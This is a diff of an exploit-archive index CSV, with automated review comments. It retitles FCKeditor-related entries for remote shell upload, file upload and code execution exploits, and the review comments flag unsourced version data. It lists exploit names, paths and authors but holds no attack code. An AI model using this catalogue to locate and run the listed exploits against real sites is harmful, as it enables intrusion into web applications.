diff --git a/files.csv b/files.csv
index 4f0fc6243..916f0fa17 100755
--- a/files.csv
+++ b/files.csv
@@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
-1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
+1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
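Review bot: The new title for 1484 nests a second ` - ` inside the parenthesis, `FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit`, while every other retitled row in this change uses the single `<product> <version> - (component) <title>` form, so anyone splitting descriptions on ` - ` gets a different shape for this row. Consider `FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Remote Shell Upload Exploit`; the same nested form is introduced for row 12254 in the @@ -11192 hunk. Relatedly, the normalization leaves the component spelled three ways across the rows it touches — `FCKEditor` here and at 12254, `FCKeditor` at 2035 and 2706, `fckeditor` everywhere else — so a search on any one spelling still misses the others.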
@@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
-1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
+1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
-2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
+2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
 2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
 2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
 2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
-2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
+2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
 2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
-5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
+5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
-5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
-5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
+5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
-5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
-5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
+5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
-5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
+5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
 5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
-5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
 5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
-5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
-5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
-5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
+5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
-6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
+6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
-6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
+6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
 6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
 6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
-6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
+6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
 6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
 6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
 6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
-6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
+6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
 6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
 6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
-6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
+6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
 6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
 6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
-6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
+6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
 6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
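Review bot: The 6419 row gains a product version, `Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln`, which is new data rather than the separator normalization the rest of the change applies, and the diff gives no source for it; the neighbouring 6413 row lists `Zanfi CMS lite 1.2`, so the value should be checked against the header of platforms/php/webapps/6419.txt before merge. The same applies to `phpegasus 0.1.2` added to row 12381 in the @@ -11304 hunk and to the reassignment of row 12254 from `CMS` to `FCKEditor Core` in the @@ -11192 hunk. If these came from the exploit files themselves, saying so in the commit message would let a reviewer tell the data corrections apart from the cosmetic retitling.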
@@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
 6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
-6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
+6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
 6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
-6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
+6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
 6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
-7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
+7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
 7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
 7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
-8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
